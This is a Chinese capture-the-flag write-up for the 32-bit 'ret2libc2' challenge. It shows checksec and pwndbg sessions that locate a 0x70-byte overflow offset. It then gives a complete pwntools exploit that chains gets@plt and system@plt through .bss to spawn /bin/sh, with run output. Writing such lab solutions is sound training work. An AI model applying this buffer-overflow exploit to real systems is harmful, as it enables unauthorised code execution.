1.题目信息
题目下载链接:https://pan.baidu.com/s/1I9IOqD3Jq6RrghlUNL0wsg 提取码:0000
2.解题分析
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')。这道题与例题1基本相似,只是程序中没有了/bin/sh字符串,我们需要通过gets函数手动写入/bin/sh字符串到一个可写可执行区域,通常在bss段,在ida找到一个地址
2.1 首先查看一下程序开了哪些安全保护
root@pwn_test1604:/ctf/work/wolf/ret2libc# checksec ./ret2libc2
[*] '/ctf/work/wolf/ret2libc/ret2libc2'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x8048000)
root@pwn_test1604:/ctf/work/wolf/ret2libc#
[0] 0:bash* 程序是小端序32位,开了NX防护。
2.2 接着使用ida查看一下程序
2.3 这道题与例题1基本相似,只是程序中没有了/bin/sh字符串,我们需要通过gets函数手动写入/bin/sh字符串到一个可写可执行区域,通常在bss段,在ida找到一个地址
2.4 通过gdb调试确定字符串s的地址离ebp有多少字节
root@pwn_test1604:/ctf/work/wolf/ret2libc# gdb ./ret2libc2
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./ret2libc2...done.
pwndbg> r
Starting program: /ctf/work/wolf/ret2libc/ret2libc2
Something surprise here, but I don't think it will work.
What do you think ?
[Inferior 1 (process 254) exited normally]
pwndbg> b main
Breakpoint 1 at 0x8048651: file ret2libc.c, line 20.
pwndbg> r
Starting program: /ctf/work/wolf/ret2libc/ret2libc2 Breakpoint 1, main () at ret2libc.c:20
20 ret2libc.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────EAX 0xf7fc6dbc (environ) —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'EBX 0x0ECX 0x166be5d2EDX 0xffffd724 ◂— 0x0EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP 0xffffd6f8 ◂— 0x0ESP 0xffffd670 —▸ 0xf7ffcd00 (_rtld_global_ro) ◂— 0x0EIP 0x8048651 (main+9) ◂— mov eax, dword ptr [0x804a060]
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────► 0x8048651 <main+9> mov eax, dword ptr [0x804a060]0x8048656 <main+14> mov dword ptr [esp + 0xc], 00x804865e <main+22> mov dword ptr [esp + 8], 20x8048666 <main+30> mov dword ptr [esp + 4], 00x804866e <main+38> mov dword ptr [esp], eax0x8048671 <main+41> call setvbuf@plt <0x80484d0>0x8048676 <main+46> mov eax, dword ptr [stdin@@GLIBC_2.0] <0x804a040>0x804867b <main+51> mov dword ptr [esp + 0xc], 00x8048683 <main+59> mov dword ptr [esp + 8], 10x804868b <main+67> mov dword ptr [esp + 4], 00x8048693 <main+75> mov dword ptr [esp], eax
─────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xf7ffcd00 (_rtld_global_ro) ◂— 0x0
01:0004│ 0xffffd674 —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
02:0008│ 0xffffd678 ◂— 0xe0
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
───────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────► f 0 8048651 main+9f 1 f7e2b637 __libc_start_main+247
Breakpoint main
pwndbg> n
21 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────EAX 0x0EBX 0x0ECX 0xf7fc6870 (_IO_stdfile_1_lock) ◂— 0x0EDX 0x0EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP 0xffffd6f8 ◂— 0x0ESP 0xffffd670 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2087EIP 0x8048676 (main+46) ◂— mov eax, dword ptr [0x804a040]
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────0x8048656 <main+14> mov dword ptr [esp + 0xc], 00x804865e <main+22> mov dword ptr [esp + 8], 20x8048666 <main+30> mov dword ptr [esp + 4], 00x804866e <main+38> mov dword ptr [esp], eax0x8048671 <main+41> call setvbuf@plt <0x80484d0>► 0x8048676 <main+46> mov eax, dword ptr [stdin@@GLIBC_2.0] <0x804a040>0x804867b <main+51> mov dword ptr [esp + 0xc], 00x8048683 <main+59> mov dword ptr [esp + 8], 10x804868b <main+67> mov dword ptr [esp + 4], 00x8048693 <main+75> mov dword ptr [esp], eax0x8048696 <main+78> call setvbuf@plt <0x80484d0>
─────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2087
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x2
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
───────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────► f 0 8048676 main+46f 1 f7e2b637 __libc_start_main+247
pwndbg> n
25 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────EAX 0x0EBX 0x0ECX 0xf7fc687c (_IO_stdfile_0_lock) ◂— 0x0EDX 0x0EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP 0xffffd6f8 ◂— 0x0ESP 0xffffd670 —▸ 0xf7fc55a0 (_IO_2_1_stdin_) ◂— 0xfbad2288EIP 0x804869b (main+83) ◂— mov dword ptr [esp], 0x8048770
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────0x804867b <main+51> mov dword ptr [esp + 0xc], 00x8048683 <main+59> mov dword ptr [esp + 8], 10x804868b <main+67> mov dword ptr [esp + 4], 00x8048693 <main+75> mov dword ptr [esp], eax0x8048696 <main+78> call setvbuf@plt <0x80484d0>► 0x804869b <main+83> mov dword ptr [esp], 0x80487700x80486a2 <main+90> call puts@plt <0x8048480>0x80486a7 <main+95> mov dword ptr [esp], 0x80487a90x80486ae <main+102> call printf@plt <0x8048450>0x80486b3 <main+107> lea eax, [esp + 0x1c]0x80486b7 <main+111> mov dword ptr [esp], eax
─────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xf7fc55a0 (_IO_2_1_stdin_) ◂— 0xfbad2288
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
───────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────► f 0 804869b main+83f 1 f7e2b637 __libc_start_main+247
pwndbg> n
Something surprise here, but I don't think it will work.
26 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────EAX 0x39EBX 0x0ECX 0xffffffffEDX 0xf7fc6870 (_IO_stdfile_1_lock) ◂— 0x0EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP 0xffffd6f8 ◂— 0x0ESP 0xffffd670 —▸ 0x8048770 ◂— push ebx /* "Something surprise here, but I don't think it will work." */EIP 0x80486a7 (main+95) ◂— mov dword ptr [esp], 0x80487a9
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────0x804868b <main+67> mov dword ptr [esp + 4], 00x8048693 <main+75> mov dword ptr [esp], eax0x8048696 <main+78> call setvbuf@plt <0x80484d0>0x804869b <main+83> mov dword ptr [esp], 0x80487700x80486a2 <main+90> call puts@plt <0x8048480>► 0x80486a7 <main+95> mov dword ptr [esp], 0x80487a90x80486ae <main+102> call printf@plt <0x8048450>0x80486b3 <main+107> lea eax, [esp + 0x1c]0x80486b7 <main+111> mov dword ptr [esp], eax0x80486ba <main+114> call gets@plt <0x8048460>0x80486bf <main+119> mov eax, 0
─────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0x8048770 ◂— push ebx /* "Something surprise here, but I don't think it will work." */
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
───────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────► f 0 80486a7 main+95f 1 f7e2b637 __libc_start_main+247
pwndbg> n
What do you think ?27 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────EAX 0x13EBX 0x0ECX 0xffffffffEDX 0xf7fc6870 (_IO_stdfile_1_lock) ◂— 0x0EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP 0xffffd6f8 ◂— 0x0ESP 0xffffd670 —▸ 0x80487a9 ◂— push edi /* 'What do you think ?' */EIP 0x80486b3 (main+107) ◂— lea eax, [esp + 0x1c]
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────0x8048696 <main+78> call setvbuf@plt <0x80484d0>0x804869b <main+83> mov dword ptr [esp], 0x80487700x80486a2 <main+90> call puts@plt <0x8048480>0x80486a7 <main+95> mov dword ptr [esp], 0x80487a90x80486ae <main+102> call printf@plt <0x8048450>► 0x80486b3 <main+107> lea eax, [esp + 0x1c]0x80486b7 <main+111> mov dword ptr [esp], eax0x80486ba <main+114> call gets@plt <0x8048460>0x80486bf <main+119> mov eax, 00x80486c4 <main+124> leave 0x80486c5 <main+125> ret
─────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0x80487a9 ◂— push edi /* 'What do you think ?' */
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ 0xffffd68c —▸ 0x8048329 ◂— pop edi /* '__libc_start_main' */
───────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────► f 0 80486b3 main+107f 1 f7e2b637 __libc_start_main+247
pwndbg> n
AAAA
29 in ret2libc.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────EAX 0xffffd68c ◂— 'AAAA'EBX 0x0ECX 0xf7fc55a0 (_IO_2_1_stdin_) ◂— 0xfbad2288EDX 0xf7fc687c (_IO_stdfile_0_lock) ◂— 0x0EDI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0ESI 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0EBP 0xffffd6f8 ◂— 0x0ESP 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'EIP 0x80486bf (main+119) ◂— mov eax, 0
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────0x80486a7 <main+95> mov dword ptr [esp], 0x80487a90x80486ae <main+102> call printf@plt <0x8048450>0x80486b3 <main+107> lea eax, [esp + 0x1c]0x80486b7 <main+111> mov dword ptr [esp], eax0x80486ba <main+114> call gets@plt <0x8048460>► 0x80486bf <main+119> mov eax, 00x80486c4 <main+124> leave 0x80486c5 <main+125> ret ↓0xf7e2b637 <__libc_start_main+247> add esp, 0x100xf7e2b63a <__libc_start_main+250> sub esp, 0xc0xf7e2b63d <__libc_start_main+253> push eax
─────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ eax 0xffffd68c ◂— 'AAAA'
───────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────► f 0 80486bf main+119f 1 f7e2b637 __libc_start_main+247
pwndbg> stack 35
00:0000│ esp 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ eax 0xffffd68c ◂— 'AAAA'
08:0020│ 0xffffd690 ◂— 0x0
09:0024│ 0xffffd694 —▸ 0xffffd734 ◂— 0x2cae0bc2
0a:0028│ 0xffffd698 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
0b:002c│ 0xffffd69c —▸ 0xf7ef9f17 (__init_misc+39) ◂— add esp, 0x10
0c:0030│ 0xffffd6a0 ◂— 0xffffffff
0d:0034│ 0xffffd6a4 ◂— 0x2f /* '/' */
0e:0038│ 0xffffd6a8 —▸ 0xf7e1fdc8 ◂— jbe 0xf7e1fdf5 /* 'v+' */
0f:003c│ 0xffffd6ac —▸ 0xf7fd21b0 —▸ 0xf7e13000 ◂— jg 0xf7e13047
10:0040│ 0xffffd6b0 ◂— 0x1
11:0044│ 0xffffd6b4 ◂— 0x8000
12:0048│ 0xffffd6b8 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
13:004c│ 0xffffd6bc —▸ 0x8048425 (_init+9) ◂— add ebx, 0x1bdb
14:0050│ 0xffffd6c0 ◂— 0x1
15:0054│ 0xffffd6c4 ◂— 0x2000000
16:0058│ 0xffffd6c8 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 (_DYNAMIC) ◂— 0x1
17:005c│ 0xffffd6cc —▸ 0x8048722 (__libc_csu_init+82) ◂— add edi, 1
18:0060│ 0xffffd6d0 ◂— 0x1
19:0064│ 0xffffd6d4 —▸ 0xffffd794 —▸ 0xffffd8cf ◂— '/ctf/work/wolf/ret2libc/ret2libc2'
1a:0068│ 0xffffd6d8 —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1b:006c│ 0xffffd6dc —▸ 0xf7e41c0b (__cxa_atexit+27) ◂— add esp, 0x10
1c:0070│ 0xffffd6e0 —▸ 0xf7fc53dc (__exit_funcs) —▸ 0xf7fc61e0 (initial) ◂— 0x0
1d:0074│ 0xffffd6e4 —▸ 0x8048258 ◂— popal /* 'a' */
1e:0078│ 0xffffd6e8 —▸ 0x80486db (__libc_csu_init+11) ◂— add ebx, 0x1925
1f:007c│ 0xffffd6ec ◂— 0x0
20:0080│ 0xffffd6f0 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
... ↓
22:0088│ ebp 0xffffd6f8 ◂— 0x0
pwndbg>
pwndbg> stack 35
00:0000│ esp 0xffffd670 —▸ 0xffffd68c ◂— 'AAAA'
01:0004│ 0xffffd674 ◂— 0x0
02:0008│ 0xffffd678 ◂— 0x1
03:000c│ 0xffffd67c ◂— 0x0
04:0010│ 0xffffd680 —▸ 0xf7ffd000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x23f40
05:0014│ 0xffffd684 —▸ 0xf7ffd918 ◂— 0x0
06:0018│ 0xffffd688 —▸ 0xffffd6a0 ◂— 0xffffffff
07:001c│ eax 0xffffd68c ◂— 'AAAA'
08:0020│ 0xffffd690 ◂— 0x0
09:0024│ 0xffffd694 —▸ 0xffffd734 ◂— 0x2cae0bc2
0a:0028│ 0xffffd698 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
0b:002c│ 0xffffd69c —▸ 0xf7ef9f17 (__init_misc+39) ◂— add esp, 0x10
0c:0030│ 0xffffd6a0 ◂— 0xffffffff
0d:0034│ 0xffffd6a4 ◂— 0x2f /* '/' */
0e:0038│ 0xffffd6a8 —▸ 0xf7e1fdc8 ◂— jbe 0xf7e1fdf5 /* 'v+' */
0f:003c│ 0xffffd6ac —▸ 0xf7fd21b0 —▸ 0xf7e13000 ◂— jg 0xf7e13047
10:0040│ 0xffffd6b0 ◂— 0x1
11:0044│ 0xffffd6b4 ◂— 0x8000
12:0048│ 0xffffd6b8 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
13:004c│ 0xffffd6bc —▸ 0x8048425 (_init+9) ◂— add ebx, 0x1bdb
14:0050│ 0xffffd6c0 ◂— 0x1
15:0054│ 0xffffd6c4 ◂— 0x2000000
16:0058│ 0xffffd6c8 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 (_DYNAMIC) ◂— 0x1
17:005c│ 0xffffd6cc —▸ 0x8048722 (__libc_csu_init+82) ◂— add edi, 1
18:0060│ 0xffffd6d0 ◂— 0x1
19:0064│ 0xffffd6d4 —▸ 0xffffd794 —▸ 0xffffd8cf ◂— '/ctf/work/wolf/ret2libc/ret2libc2'
1a:0068│ 0xffffd6d8 —▸ 0xffffd79c —▸ 0xffffd8f1 ◂— 'LESSOPEN=| /usr/bin/lesspipe %s'
1b:006c│ 0xffffd6dc —▸ 0xf7e41c0b (__cxa_atexit+27) ◂— add esp, 0x10
1c:0070│ 0xffffd6e0 —▸ 0xf7fc53dc (__exit_funcs) —▸ 0xf7fc61e0 (initial) ◂— 0x0
1d:0074│ 0xffffd6e4 —▸ 0x8048258 ◂— popal /* 'a' */
1e:0078│ 0xffffd6e8 —▸ 0x80486db (__libc_csu_init+11) ◂— add ebx, 0x1925
1f:007c│ 0xffffd6ec ◂— 0x0
20:0080│ 0xffffd6f0 —▸ 0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
... ↓
22:0088│ ebp 0xffffd6f8 ◂— 0x0
2.5 再加上ebp的4个字节,总共需要填充0x70个字节到返回地址
Python 2.7.18 (default, Aug 1 2022, 06:23:55)
[GCC 12.1.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 0xd6f8-0xd68c
108
>>> 108/16
6
>>> 112/16
7
>>>
3.exp
3.1完整的源码
#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal=["tmux","sp","-h"]
context.log_level='debug'
#context.arch='i386'DEBUG = 1LOCAL = True
BIN ='./ret2libc2'
HOST ='pwn2.jarvisoj.com'
PORT =9877
#HOST ='node5.buuoj.cn'
#PORT =29787def get_base_address(proc):return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)def debug(bps,_s):script = "handle SIGALRM ignore\n"PIE = get_base_address(p)script += "set $_base = 0x{:x}\n".format(PIE)for bp in bps:script += "b *0x%x\n"%(PIE+bp)script += _sgdb.attach(p,gdbscript=script)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab#shellcode = asm(shellcraft.sh())def exploit(p):elf = ELF('./ret2libc2')sys_addr = elf.plt['system']gets_addr = elf.plt['gets']bss_addr = 0x0804A080payload = cyclic(0x70) + p32(gets_addr) + p32(sys_addr) + p32(bss_addr) + p32(bss_addr)p.recv()p.sendline(payload)p.sendline('/bin/sh')p.interactive()returnif __name__ == "__main__":elf = ELF(BIN)if len(sys.argv) > 1:LOCAL = Falsep = remote(HOST, PORT)exploit(p)else:LOCAL = Truep = process(BIN)log.info('PID: '+ str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],"")exploit(p)3.2 只需要修改的内容
DEBUG = 1
LOCAL = True
BIN ='./ret2libc2'
def exploit(p):
elf = ELF('./ret2libc2')
sys_addr = elf.plt['system']
gets_addr = elf.plt['gets']
bss_addr = 0x0804A080
payload = cyclic(0x70) + p32(gets_addr) + p32(sys_addr) + p32(bss_addr) + p32(bss_addr)
p.recv()
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()
return
3.3 运行结果
root@pwn_test1604:/ctf/work/wolf/ret2libc# python ret2libc2-1.py │───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────
[DEBUG] PLT 0x8048450 printf │ ► 0xf7fb2589 <__kernel_vsyscall+9> pop ebp
[DEBUG] PLT 0x8048450 printf │ 0xf7fb258a <__kernel_vsyscall+10> pop edx
[DEBUG] PLT 0x8048460 gets │ 0xf7fb258b <__kernel_vsyscall+11> pop ecx
[DEBUG] PLT 0x8048470 time │ 0xf7fb258c <__kernel_vsyscall+12> ret
[DEBUG] PLT 0x8048480 puts │ ↓
[DEBUG] PLT 0x8048490 system │ 0xf7ec3b23 <__read_nocancel+25> pop ebx
[DEBUG] PLT 0x80484a0 __gmon_start__ │ 0xf7ec3b24 <__read_nocancel+26> cmp eax, 0xfffff001
[DEBUG] PLT 0x80484b0 srand │ 0xf7ec3b29 <__read_nocancel+31> jae __syscall_error <0xf7e06730>
[DEBUG] PLT 0x80484c0 __libc_start_main │ ↓
[DEBUG] PLT 0x80484d0 setvbuf │ 0xf7e06730 <__syscall_error> call __x86.get_pc_thunk.dx <0xf7f0db5d>
[DEBUG] PLT 0x80484e0 rand │
[DEBUG] PLT 0x80484f0 __isoc99_scanf │ 0xf7e06735 <__syscall_error+5> add edx, 0x1998cb
[*] '/ctf/work/wolf/ret2libc/ret2libc2' │ 0xf7e0673b <__syscall_error+11> mov ecx, dword ptr gs:[0]Arch: i386-32-little │ 0xf7e06742 <__syscall_error+18> neg eaxRELRO: Partial RELRO │────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────Stack: No canary found │00:0000│ esp 0xffcdb088 —▸ 0xffcdb0d8 —▸ 0xffcdb158 —▸ 0xffcdb1e8 ◂— 0x0NX: NX enabled │01:0004│ 0xffcdb08c ◂— 0x1000PIE: No PIE (0x8048000) │02:0008│ 0xffcdb090 —▸ 0x862d008 ◂— 0x0
[+] Starting local process './ret2libc2': pid 295 │03:000c│ 0xffcdb094 —▸ 0xf7ec3b23 (__read_nocancel+25) ◂— pop ebx
[*] PID: 295 │04:0010│ 0xffcdb098 —▸ 0xf7fa0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
[DEBUG] Wrote gdb script to '/tmp/pwnKNJz0a.gdb' │05:0014│ 0xffcdb09c —▸ 0xf7e58267 (_IO_file_underflow+295) ◂— add esp, 0x10file ./ret2libc2 │06:0018│ 0xffcdb0a0 ◂— 0x0handle SIGALRM ignore │07:001c│ 0xffcdb0a4 —▸ 0x862d008 ◂— 0x0set $_base = 0x8048000 │──────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────
[*] running in new terminal: /usr/bin/gdb -q "./ret2libc2" 295 -x "/tmp/pwnKNJz0a.gdb" │ ► f 0 f7fb2589 __kernel_vsyscall+9
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q "./ret2libc2" 295 -x "/│ f 1 f7ec3b23 __read_nocancel+25
tmp/pwnKNJz0a.gdb"'] │ f 2 f7e58267 _IO_file_underflow+295
[+] Waiting for debugger: Done │ f 3 f7e59237 _IO_default_uflow+23
[DEBUG] PLT 0x8048450 printf │ f 4 f7e5902c __uflow+140
[DEBUG] PLT 0x8048460 gets │ f 5 f7e4d529 gets+329
[DEBUG] PLT 0x8048470 time │ f 6 80486bf main+119
[DEBUG] PLT 0x8048480 puts │ f 7 f7e06637 __libc_start_main+247
[DEBUG] PLT 0x8048490 system │pwndbg> c
[DEBUG] PLT 0x80484a0 __gmon_start__ │Continuing.
[DEBUG] PLT 0x80484b0 srand │[New process 309]
[DEBUG] PLT 0x80484c0 __libc_start_main │process 309 is executing new program: /bin/dash
[DEBUG] PLT 0x80484d0 setvbuf │[New process 310]
[DEBUG] PLT 0x80484e0 rand │process 310 is executing new program: /bin/dash
[DEBUG] PLT 0x80484f0 __isoc99_scanf │i[New process 311]
[DEBUG] Received 0x4c bytes: │process 311 is executing new program: /usr/bin/id"Something surprise here, but I don't think it will work.\n" │[Thread debugging using libthread_db enabled]'What do you think ?' │Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
